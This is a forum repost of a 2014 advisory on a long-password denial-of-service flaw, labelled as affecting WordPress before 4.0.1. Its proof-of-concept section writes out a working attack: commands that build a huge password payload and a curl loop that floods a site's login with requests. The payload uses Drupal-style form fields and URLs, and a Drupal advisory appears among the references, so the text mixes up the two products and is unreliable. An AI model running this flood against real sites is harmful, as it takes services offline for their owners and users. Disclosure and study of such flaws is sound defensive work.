LLegoLLaS Posted December 1, 2014 Report Share Posted December 1, 2014 (edited) ====================================================================DESCRIPTION:====================================================================A vulnerability present in Wordpress < 4.0.1 allows anattacker to send specially crafted requests resulting in CPU and memoryexhaustion. This may lead to the site becoming unavailable orunresponsive (denial of service).====================================================================Time Line:====================================================================November 20, 2014 - A Wordpress security update and the securityadvisory is published.====================================================================Proof of Concept:====================================================================Generate a pyaload and try with a valid user:echo -n "name=admin&pass=" > valid_user_payload && printf "%s"{1..1000000} >> valid_user_payload && echo -n "&op=Login&form_id=user_login" >> valid_user_payloadPerform a Dos with a valid user:for i in `seq 1 150`; do (curl --data @valid_user_payload[url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done====================================================================Authors:====================================================================-- Javer Nieto -- [url=http://www.behindthefirewalls.com]Hacking while you're asleep[/url]-- Andres Rojas -- [url=http://www.devconsole.info]# /dev/console | "In the beginning … Was the command line" (Neal Stephenson)[/url]====================================================================References:====================================================================* [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url]* [url]https://www.drupal.org/SA-CORE-2014-006[/url]*[url=http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html]Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]*[url=http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html]Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]* [url=http://www.devconsole.info/?p=1050]Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console[/url]sursa;bugsearch.net Edited December 1, 2014 by LLegoLLaS Quote Link to comment Share on other sites More sharing options...
